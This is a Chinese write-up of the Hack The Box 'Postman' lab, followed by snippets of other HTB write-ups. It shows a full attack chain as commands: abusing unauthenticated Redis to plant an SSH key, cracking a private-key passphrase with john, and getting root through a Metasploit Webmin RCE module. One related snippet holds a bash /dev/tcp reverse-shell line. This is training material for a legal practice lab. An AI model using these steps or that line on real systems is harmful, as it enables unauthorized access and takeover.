hee_mee
hee_mee

HTB-postman

端口扫描

nmap -sC -sV -oA path postman.htb

22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Login to Webmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现19.1版本的webmin,但是多次测试之后发现无法似乎未开启密码重置功能。
上网看了一圈 发现nmap未扫到的redis端口

PORT     STATE SERVICE    VERSION                                
6379/tcp open  tcpwrapped

redis 未授权访问

生成ssh公钥,写入redis

生成ssh公钥
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
写入redis
cat /root/.ssh/key.txt | redis-cli -h 10.10.10.160 -x set xxx

连接redis,导入公钥

连接redis
redis-cli -h 10.10.10.160
导入公钥
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized_keys"
save

ssh连接redis

ssh -i /root/.ssh/id_rsa [email protected]

查看一下user.txt位置

redis@Postman:/opt$ locate user.txt                   
/home/Matt/user.txt  
redis@Postman:/opt$ ls -la /home/Matt/user.txt    
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt

获得Matt私钥

发现需要获得Matt密码,通过nmap扫描结果可以知道靶机开启了ssh,所以找找Matt的ssh私钥

redis@Postman:/opt$ locate id_rsa*                         
/opt/id_rsa.bak  
redis@Postman:/opt$ ls -la /opt/id_rsa.bak           
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak

密码爆破

使用john在攻击机上进行密码爆破

python3 /usr/share/john/ssh2john.py Matt_pass.txt > pass
john --wordlist=/usr/share/wordlists/rockyou.txt pass

获得Matt用户密码:computer2008

切换用户,获取flag

redis@Postman:/opt$ su Matt               
Password:                                           
Matt@Postman:~$ wc -c user.txt              
33 user.txt

获取root权限

发现webmin为19.1版本,使用msf中的模块获取root

msf5 > search webmin
msf5 exploit(linux/http/webmin_backdoor) > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > setg username Matt      
username => Matt 
msf5 exploit(linux/http/webmin_packageup_rce) > setg password computer2008 
password => computer2008  
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160 
rhosts => 10.10.10.160

值得注意的是需要设置 ssl 为 true
否则无法建立连接

msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true 
ssl => true

获得flag

wc -c /root/root.txt
33 /root/root.txt

你可能感兴趣的:(HTB)

  • HTB-CozyHosting Y4y17 HackTheBox网络安全安全学习web安全安全威胁分析
    目标靶机的IP地址为10.10.11.230,下面测试连接的稳定性!攻击机的IP地址为10.10.14.67!有一点点慢,应该是问题不大!信息收集#nmap-sT--min-rate10000-p-10.10.11.230-oNport.nmapStartingNmap7.94(https://nmap.org)at2024-02-1517:36CSTWarning:10.10.11.230giv
  • HTB-Analytics Y4y17 HackTheBox网络安全学习安全威胁分析web安全安全
    靶机的IP地址为10.10.11.233,攻击机的IP地址为10.10.16.30信息收集#nmap-sT--min-rate10000-p-10.10.11.233-oNport.nmapStartingNmap7.94(https://nmap.org)at2024-02-1914:50CSTWarning:10.10.11.233givinguponportbecauseretransmis
  • 入坑 Hack The Box lainwith 靶机htb
    目录介绍HackingTheBox(HTB)vsVulnHub注册使用1:直接连接windows连接htb1.下载安装OpenVPN2.获取VPN配置文件3.导入配置文件4.连接VPN5.验证可行性linux使用2:借助VPS使用SSH【懒人版】入门HTBAcademy资源推荐安全牛哔哩哔哩介绍视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh官方文档
  • Hackthebox Shoppy攻略 bruce121385 web安全安全网络安全系统安全
    免责声明:本教程仅限学术讨论使用,请勿作用于非法用途!!!如有用于非法用途,本人概不负责。一、信息收集1、端口扫描发现两个端口:22、80;其中80端口扫描后发现其重定向至域名http://shoppy.htb我们将域名添加至/etc/hosts中,使kali可以解析。2、子域名收集我们发现一个域名,所以我们可以尝试是否存在子域名。找到子域名mattermost.shoppy.htb,并将其添加到
  • [原创]夺棋赛HackTheBox OpenSource攻略 huandaohack 安全安全web安全网络
    最近很忙,方案,建模大赛的技术支持,再忙也不忘自身的修行学习,都是抽取下班后晚上的时间做的,搞了4天,最终拿下棋子。简介HackTheBox(缩写HTB),HTB是一个网络安全攻防竞技场,全球的顶尖高手很多在上面,有人在上面出题(防守),就有人解题(攻击)。想提高网络攻防水平就来玩这个game平台。这个平台一个优点是靶机是现成的,也是免费的。同样VulnHub也很出名,但VulnHub要自己下载虚
  • HTB Monitored Som3B0dy HackTheBox网络安全
    MonitoreduserNmap┌──(kali㉿kali)-[~]└─$nmap-A10.10.11.248StartingNmap7.80(https://nmap.org)at2024-01-1423:42CSTStats:0:00:15elapsed;0hostscompleted(1up),1undergoingConnectS
  • HTB Pov Som3B0dy HackTheBox网络安全
    PovUserNmap┌──(kali㉿kali)-[~/freeAv]└─$nmap-A10.10.11.251StartingNm
  • HTB Analysis Som3B0dy HackTheBox网络安全php
    Analysisusernmap➜~nmap-A10.10.11.250StartingNmap7.80(https://nmap.org)at2024-01-2321:57CSTNmapscanreportforlocalhost(10.10.11.250)Hostisup(0.14slatency).Notshown:987closedportsPORTSTATESERVICEVERSION5
  • HTB-AdmirerToo H0ne 安全linux
    第一步:nmap扫描nmap-Pn-sF-sV-sC-A10.10.11.137-Pn:不进行ping扫描-sF:探测防火墙状态-sV:探测开放端口以确定服务/版本信息-A:选项用于使用进攻性方式扫描-sC:使用-sC或-A选项拦描时候默认的脚本,提供基本脚本扫描能力看到端口80已打开,用dirsearch枚举web应用程序python3dirsearch.py-uhttp://10.10.11.
  • Hack The Box-Pov 0415i HTB靶场合集hacktheboxWindows.NET提权
    信息收集&端口利用先使用nmap对主机进行端口扫描nmap10.10.11.251只开放了80端口访问网站后发现没有什么功能点,尝试目录扫描并没有什么能够利用的点使用gobuster进行子域名扫描gobusterdns-dpov.htb-w/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt扫描出了d
  • Hack The Box-Analysis 0415i HTB靶场合集网络webwindowsmsfconsoleevil_winrmreg
    信息收集&端口利用直接上nmap一把梭哈nmap10.10.11.250发现开放了ldap有关协议,使用enum4linux的-l参数扫描,-l参数代表扫描ldap协议相关漏洞enum4linux-l10.10.11.250能扫描出域名为analysis,将域名加入到hosts文件中,并作为自定义DNS服务器后获取一些子域gobusterdns-danalysis.htb-w/usr/share/
  • 2021-02-23 HTB Laboratory Walkthrough ev3rrr
    目标IP:10.10.10.216信息搜集端口扫描nmap443端口扫描到两个网站,分别是https://laboratory.htbhttps://git.laboratory.htbhttps://laboratory.htb是一个网页,暂时没什么值得注意的https://git.laboratory.htb是一个gitlab网站,注册需要@laboratory.htb的邮箱,不知道这个是否对
  • Linux/Academy ve9etable HackTheBox网络安全web安全
    Enumerationnmap首先扫描目标端口对外开放情况nmap-p-10.10.10.215-T4发现对外开放了22,80,33060三个端口,端口详细信息如下结果显示80端口运行着http,且给出了域名academy.htb,现将ip与域名写到/et/hosts中,然后从http入手TCP/80访问站点,看到了HTB的图标还怀疑了10秒钟站点有一个登录口,一个注册口,通过查看网页源代码中的后
  • Linux/Tabby ve9etable HackTheBox网络安全web安全
    Enumerationnmap已知目标开放了22,80,8080端口,扫描详细情况如下TCP/80显示80和8080分别是Apache和Tomcat,而22是ssh,Apache页面如下页面上有些链接指向http://megahosting.htb/news.php?file=statement,因为无法进行域名解析,因此出现错误在/etc/hosts文件中添加10.10.10.194megaho
  • Linux/Doctor ve9etable HackTheBox网络安全web安全
    Enumerationnmap已知目标开放了22,80,8089端口,扫描详细情况如下可以看到对外开放了22,80,8089三个端口TCP/80SSTI访问80端口,有一个[email protected]的电子邮件,点击其他的也没有什么反应,猜测有可能需要域名访问在/etc/hosts中增加主机与域名然后在浏览器中访问该域名,进入了DoctorSecureMessaging登录页面,还可以注册新用
  • 【HTB】Horizontal(vhost爆破,chisel隧道) 天线锅仔
    免责声明本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。服务探测┌──(rootkali)-[~]└─#nmap-sV-Pn10.10.11.105Hostdiscoverydisabled(-Pn).Alladdresseswillbemarked'up'a
  • Hack The Box - TIER 0 - Meow Fawn Dancing Tajang HackTheBoxweb安全渗透测试
    新学期开始了,新的学习也开始了,寒假打算闭关的,但没耐住玩。2021总结找时间整理整理再写。实战有点难,代码审计有师傅建议先别搞,那刷刷HTB也不错,多方好评。Meow看新手入门连接到HTB的靶机过后,就打开了第一个,好像前面不做也只能打开第一个。连接后我先没有看靶机,9个任务居然是问答题,一题一题翻译做,答案如下:TASK1WhatdoestheacronymVMstandfor?首字母缩略词V
  • htb(二) wanan0red phplinuxbash
    Oopsieproxy发现不是这里可以看到有个login尝试发现是/cdn-cgi/login发现需要adminCookie将id修改为134322记得之前扫到的/uploads目录db.php/bin/bash-c'bash-i&>/dev/tcp/10.10.14.217/55550catchmod+xcataf13b0bee69f8a877c3faf667f7beacfVaccineftpa
  • HTB Napper WriteUp Som3B0dy HackTheBox网络安全
    Napper2023年11月12日14:58:35UserNmap➜Nappernmap-sCV-A-p-10.10.11.240--min-rate10000StartingNmap
  • htb Analysis wp 春猿火 安全
    施工中StartingNmap7.94(https://nmap.org)at2024-01-2023:15ESTNmapscanreportfor10.129.7.235Hostisup(0.47slatency).PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus80/tcpopenhttpMicrosoftHTTPAPIhttpd2.0(
  • [HTB][Sherlocks] Meerkat Мартин. HackTheBox网络安全
    作为一家快速发展的初创公司,Forela一直在利用商业管理平台。不幸的是,我们的文档很少,而且我们的管理员也不是最有安全意识的。作为我们的新安全提供商,我们希望您查看我们导出的一些PCAP和日志数据,以确认我们是否已经(或没有)被泄露。TASK1题目:我们认为我们的业务管理平台服务器已被破坏。请确认正在运行的应用程序的名称?打开分析,端点进行数据分析172为内网地址,根据题目意思,那么商业管理平台
  • 【HTB-Sherlocks-OpTinselTrace-3 WP 应急响应-内存取证】 Asymptote_tanaka 网络安全-应急网络安全
    连接:HackTheBox文件下载解压后是一个内存文件santaclaus.bin,使用vol3去进行内存取证,因为该内存镜像是win10版本的1.Whatisthenameofthefilethatislikelycopiedfromthesharedfolder(includingthefileextension)?【可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?】使用命令vol.
  • 【Sherlocks圣诞节特辑】htb OpTinselTrace-3 wp 春猿火 linux安全
    TASK1Whatisthenameofthefilethatislikelycopiedfromthesharedfolder(includingthefileextension)?可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?TASK2Whatisthefilenameusedtotriggertheattack(includingthefileextension)?用于触发攻击的
  • 【Sherlocks圣诞节特辑】htb OpTinselTrace-4 wp 春猿火 php开发语言
    TASK1Theperformanceofthenetworkprinterserverhasbecomesluggish,causinginterruptionsintheworkflowattheNorthPoleworkshop.Santahasdirectedustogenerateasupportrequestandexaminethenetworkdatatopinpointtheso
  • htb snoopy wp记录 春猿火 安全网络服务器git
    这个破靶机难度不高但是也不低…考的东西蛮多,卡在主页太久了,收集完信息后一直太多时间浪费在fuzz首页的download接口,感谢hxd发现afr有路径过滤,要不这靶机彻底卡这了。惯例nmap扫一下无视22,看到开了53和80,看到53是起了dns的,话不多说直接把自己的dns指向他再接着看webng的1.18应该…这个靶机能用的上的漏洞我是真没找到1.首页有两个here看眼源码第一个对应http
  • 【Sherlocks圣诞节特辑】htb OpTinselTrace-2 wp 春猿火 安全aws
    圣诞系列5台的文件信息是复用的,这里先更一下OpTinselTrace-2,OpTinselTrace-1会这周内更新。task1WhatistheMD5sumofthebinarytheThreatActorfoundtheS3bucketlocationin?aws的bucket里的二进制程序md5task2WhattimedidtheThreatActorbegintheirautomate
  • htb monitorstwo wp记录 春猿火 php系统安全docker
    哼哼啊啊啊啊好久没打靶了身体不太gud,今儿久违的打一个直接开冲个上周的ez靶机上来梭哈nmap扫一扫└─$sudonmap-sS10.10.11.211-p--sC--min-rate=10000StartingNmap7.93(https://nmap.org)at2023-05-0804:02-0930Warning:10.10.11.211givinguponportbecauseretr
  • htb jupiter root简记 wp 春猿火 系统安全
    简单说一下还是这个东西,直接执行会提示缺少配置文件搜下关键字看看有没有关联的这里出来个绝对路径的怀疑是他的目标配置写个json丢这,然后根据他的报错疯狂fuzz,报错缺什么就加什么然后我倒在了这里,他说有一组数组,但是没给变量名它既然能跑就肯定会有现成的config,于是搜了下软件名,在share下找到个目录如果没有这个config的话我就得直接拆包了重点是"tleroot":"/tmp/tle/
  • htb Sandworm wp 春猿火 linuxrust安全
    nmap有域名ssa.htb加到hosts看web爆dns和域名点到contact里面有个guide可以点点进去之后web如下从上往下依次是;测试解密密文测试公钥加密生成密文你的公钥信息和签名这边他会给你一个测试用的key尝试一下用他的公钥解一下他的签名试了一会,发现这里是可以模板注入我这里修改了自己的签名用户id为{{7*7}},输出了一个通过修改自己的证书是可以执行注入的但是我懒得修改…于是我
  • htb codify root 脚本 春猿火 pythonlinux开发语言
    ?填充方式importsubprocessimportstringpd=[]s=string.printabledefreco(jp):re=subprocess.run(f'echo{jp}|sudo./aha.sh',shell=True,stdout=subprocess.PIPE,text=True)returnre.stdoutwhileTrue:rei=reco(''.join(pd)
  • 开发者关心的那些事 圣子足道 ios游戏编程apple支付
    我要在app里添加IAP,必须要注册自己的产品标识符(product identifiers)。产品标识符是什么? 产品标识符(Product Identifiers)是一串字符串,它用来识别你在应用内贩卖的每件商品。App Store用产品标识符来检索产品信息,标识符只能包含大小写字母(A-Z)、数字(0-9)、下划线(-)、以及圆点(.)。你可以任意排列这些元素,但我们建议你创建标识符时使用
  • 负载均衡器技术Nginx和F5的优缺点对比 bijian1013 nginxF5
            对于数据流量过大的网络中,往往单一设备无法承担,需要多台设备进行数据分流,而负载均衡器就是用来将数据分流到多台设备的一个转发器。         目前有许多不同的负载均衡技术用以满足不同的应用需求,如软/硬件负载均衡、本地/全局负载均衡、更高
  • LeetCode[Math] - #9 Palindrome Number Cwind javaAlgorithm题解LeetCodeMath
    原题链接:#9 Palindrome Number   要求: 判断一个整数是否是回文数,不要使用额外的存储空间   难度:简单   分析: 题目限制不允许使用额外的存储空间应指不允许使用O(n)的内存空间,O(1)的内存用于存储中间结果是可以接受的。于是考虑将该整型数反转,然后与原数字进行比较。 注:没有看到有关负数是否可以是回文数的明确结论,例如
  • 画图板的基本实现 15700786134 画图板
     要实现画图板的基本功能,除了在qq登陆界面中用到的组件和方法外,还需要添加鼠标监听器,和接口实现。 首先,需要显示一个JFrame界面: public class DrameFrame extends JFrame {              //显示
  • linux的ps命令 被触发 linux
    Linux中的ps命令是Process Status的缩写。ps命令用来列出系统中当前运行的那些进程。ps命令列出的是当前那些进程的快照,就是执行ps命令的那个时刻的那些进程,如果想要动态的显示进程信息,就可以使用top命令。 要对进程进行监测和控制,首先必须要了解当前进程的情况,也就是需要查看当前进程,而 ps 命令就是最基本同时也是非常强大的进程查看命令。使用该命令可以确定有哪些进程正在运行
  • Android 音乐播放器 下一曲 连续跳几首歌 肆无忌惮_ android
    最近在写安卓音乐播放器的时候遇到个问题。在MediaPlayer播放结束时会回调 player.setOnCompletionListener(new OnCompletionListener() { @Override public void onCompletion(MediaPlayer mp) { mp.reset(); Log.i("H
  • java导出txt文件的例子 知了ing javaservlet
    代码很简单就一个servlet,如下: package com.eastcom.servlet; import java.io.BufferedOutputStream; import java.io.IOException; import java.net.URLEncoder; import java.sql.Connection; import java.sql.Resu
  • Scala stack试玩, 提高第三方依赖下载速度 矮蛋蛋 scalasbt
    原文地址: http://segmentfault.com/a/1190000002894524 sbt下载速度实在是惨不忍睹, 需要做些配置优化 下载typesafe离线包, 保存为ivy本地库 wget http://downloads.typesafe.com/typesafe-activator/1.3.4/typesafe-activator-1.3.4.zip 解压r
  • phantomjs安装(linux,附带环境变量设置) ,以及casperjs安装。 alleni123 linuxspider
    1. 首先从官网 http://phantomjs.org/下载phantomjs压缩包,解压缩到/root/phantomjs文件夹。 2. 安装依赖 sudo yum install fontconfig freetype libfreetype.so.6 libfontconfig.so.1 libstdc++.so.6 3. 配置环境变量 vi /etc/profil
  • JAVA IO FileInputStream和FileOutputStream,字节流的打包输出 百合不是茶 java核心思想JAVA IO操作字节流
    在程序设计语言中,数据的保存是基本,如果某程序语言不能保存数据那么该语言是不可能存在的,JAVA是当今最流行的面向对象设计语言之一,在保存数据中也有自己独特的一面,字节流和字符流 1,字节流是由字节构成的,字符流是由字符构成的 字节流和字符流都是继承的InputStream和OutPutStream ,java中两种最基本的就是字节流和字符流   类 FileInputStream
  • Spring基础实例(依赖注入和控制反转) bijian1013 spring
    前提条件:在http://www.springsource.org/download网站上下载Spring框架,并将spring.jar、log4j-1.2.15.jar、commons-logging.jar加载至工程1.武器接口 package com.bijian.spring.base3; public interface Weapon { void kil
  • HR看重的十大技能 bijian1013 提升能力HR成长
        一个人掌握何种技能取决于他的兴趣、能力和聪明程度,也取决于他所能支配的资源以及制定的事业目标,拥有过硬技能的人有更多的工作机会。但是,由于经济发展前景不确定,掌握对你的事业有所帮助的技能显得尤为重要。以下是最受雇主欢迎的十种技能。   一、解决问题的能力   每天,我们都要在生活和工作中解决一些综合性的问题。那些能够发现问题、解决问题并迅速作出有效决
  • 【Thrift一】Thrift编译安装 bit1129 thrift
    什么是Thrift The Apache Thrift software framework, for scalable cross-language services development, combines a software stack with a code generation engine to build services that work efficiently and s
  • 【Avro三】Hadoop MapReduce读写Avro文件 bit1129 mapreduce
    Avro是Doug Cutting(此人绝对是神一般的存在)牵头开发的。 开发之初就是围绕着完善Hadoop生态系统的数据处理而开展的(使用Avro作为Hadoop MapReduce需要处理数据序列化和反序列化的场景),因此Hadoop MapReduce集成Avro也就是自然而然的事情。 这个例子是一个简单的Hadoop MapReduce读取Avro格式的源文件进行计数统计,然后将计算结果
  • nginx定制500,502,503,504页面 ronin47 nginx 错误显示
    server { listen 80; error_page 500/500.html; error_page 502/502.html; error_page 503/503.html; error_page 504/504.html; location /test {return502;}} 配置很简单,和配
  • java-1.二叉查找树转为双向链表 bylijinnan 二叉查找树
    import java.util.ArrayList; import java.util.List; public class BSTreeToLinkedList { /* 把二元查找树转变成排序的双向链表 题目: 输入一棵二元查找树,将该二元查找树转换成一个排序的双向链表。 要求不能创建任何新的结点,只调整指针的指向。 10 / \ 6 14 / \
  • Netty源码学习-HTTP-tunnel bylijinnan javanetty
    Netty关于HTTP tunnel的说明: http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/socket/http/package-summary.html#package_description 这个说明有点太简略了 一个完整的例子在这里: https://github.com/bylijinnan
  • JSONUtil.serialize(map)和JSON.toJSONString(map)的区别 coder_xpf jqueryjsonmapval()
     JSONUtil.serialize(map)和JSON.toJSONString(map)的区别   数据库查询出来的map有一个字段为空   通过System.out.println()输出 JSONUtil.serialize(map): {"one":"1","two":"nul
  • Hibernate缓存总结 cuishikuan 开源sshjavawebhibernate缓存三大框架
    一、为什么要用Hibernate缓存? Hibernate是一个持久层框架,经常访问物理数据库。 为了降低应用程序对物理数据源访问的频次,从而提高应用程序的运行性能。 缓存内的数据是对物理数据源中的数据的复制,应用程序在运行时从缓存读写数据,在特定的时刻或事件会同步缓存和物理数据源的数据。   二、Hibernate缓存原理是怎样的? Hibernate缓存包括两大类:Hib
  • CentOs6 dalan_123 centos
    首先su - 切换到root下面1、首先要先安装GCC GCC-C++ Openssl等以来模块:yum -y install make gcc gcc-c++ kernel-devel m4 ncurses-devel openssl-devel2、再安装ncurses模块yum -y install ncurses-develyum install ncurses-devel3、下载Erang
  • 10款用 jquery 实现滚动条至页面底端自动加载数据效果 dcj3sjt126com JavaScript
      无限滚动自动翻页可以说是web2.0时代的一项堪称伟大的技术,它让我们在浏览页面的时候只需要把滚动条拉到网页底部就能自动显示下一页的结果,改变了一直以来只能通过点击下一页来翻页这种常规做法。 无限滚动自动翻页技术的鼻祖是微博的先驱:推特(twitter),后来必应图片搜索、谷歌图片搜索、google reader、箱包批发网等纷纷抄袭了这一项技术,于是靠滚动浏览器滚动条
  • ImageButton去边框&Button或者ImageButton的背景透明 dcj3sjt126com imagebutton
    在ImageButton中载入图片后,很多人会觉得有图片周围的白边会影响到美观,其实解决这个问题有两种方法 一种方法是将ImageButton的背景改为所需要的图片。如:android:background="@drawable/XXX" 第二种方法就是将ImageButton背景改为透明,这个方法更常用 在XML里;    <ImageBut
  • JSP之c:foreach eksliang jspforearch
    原文出自:http://www.cnblogs.com/draem0507/archive/2012/09/24/2699745.html <c:forEach>标签用于通用数据循环,它有以下属性 属 性 描 述 是否必须 缺省值 items 进行循环的项目 否 无 begin 开始条件 否 0 end 结束条件 否 集合中的最后一个项目 step 步长 否 1
  • Android实现主动连接蓝牙耳机 gqdy365 android
    在Android程序中可以实现自动扫描蓝牙、配对蓝牙、建立数据通道。蓝牙分不同类型,这篇文字只讨论如何与蓝牙耳机连接。 大致可以分三步: 一、扫描蓝牙设备: 1、注册并监听广播: BluetoothAdapter.ACTION_DISCOVERY_STARTED BluetoothDevice.ACTION_FOUND BluetoothAdapter.ACTION_DIS
  • android学习轨迹之四:org.json.JSONException: No value for hyz301 json
    org.json.JSONException: No value for items  在JSON解析中会遇到一种错误,很常见的错误   06-21 12:19:08.714 2098-2127/com.jikexueyuan.secret I/System.out﹕ Result:{"status":1,"page":1,&
  • 干货分享:从零开始学编程 系列汇总 justjavac 编程
    程序员总爱重新发明轮子,于是做了要给轮子汇总。 从零开始写个编译器吧系列 (知乎专栏) 从零开始写一个简单的操作系统 (伯乐在线) 从零开始写JavaScript框架 (图灵社区) 从零开始写jQuery框架 (蓝色理想 ) 从零开始nodejs系列文章 (粉丝日志) 从零开始编写网络游戏 
  • jquery-autocomplete 使用手册 macroli jqueryAjax脚本
    jquery-autocomplete学习 一、用前必备 官方网站:http://bassistance.de/jquery-plugins/jquery-plugin-autocomplete/ 当前版本:1.1 需要JQuery版本:1.2.6 二、使用 <script src="./jquery-1.3.2.js" type="text/ja
  • PLSQL-Developer或者Navicat等工具连接远程oracle数据库的详细配置以及数据库编码的修改 超声波 oracleplsql
      在服务器上将Oracle安装好之后接下来要做的就是通过本地机器来远程连接服务器端的oracle数据库,常用的客户端连接工具就是PLSQL-Developer或者Navicat这些工具了。刚开始也是各种报错,什么TNS:no listener;TNS:lost connection;TNS:target hosts...花了一天的时间终于让PLSQL-Developer和Navicat等这些客户
  • 数据仓库数据模型之:极限存储--历史拉链表 superlxw1234 极限存储数据仓库数据模型拉链历史表
    在数据仓库的数据模型设计过程中,经常会遇到这样的需求: 1. 数据量比较大; 2. 表中的部分字段会被update,如用户的地址,产品的描述信息,订单的状态等等; 3. 需要查看某一个时间点或者时间段的历史快照信息,比如,查看某一个订单在历史某一个时间点的状态,    比如,查看某一个用户在过去某一段时间内,更新过几次等等; 4. 变化的比例和频率不是很大,比如,总共有10
  • 10点睛Spring MVC4.1-全局异常处理 wiselyman spring mvc
    10.1 全局异常处理 使用@ControllerAdvice注解来实现全局异常处理; 使用@ControllerAdvice的属性缩小处理范围 10.2 演示 演示控制器 package com.wisely.web; import org.springframework.stereotype.Controller; import org.spring
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他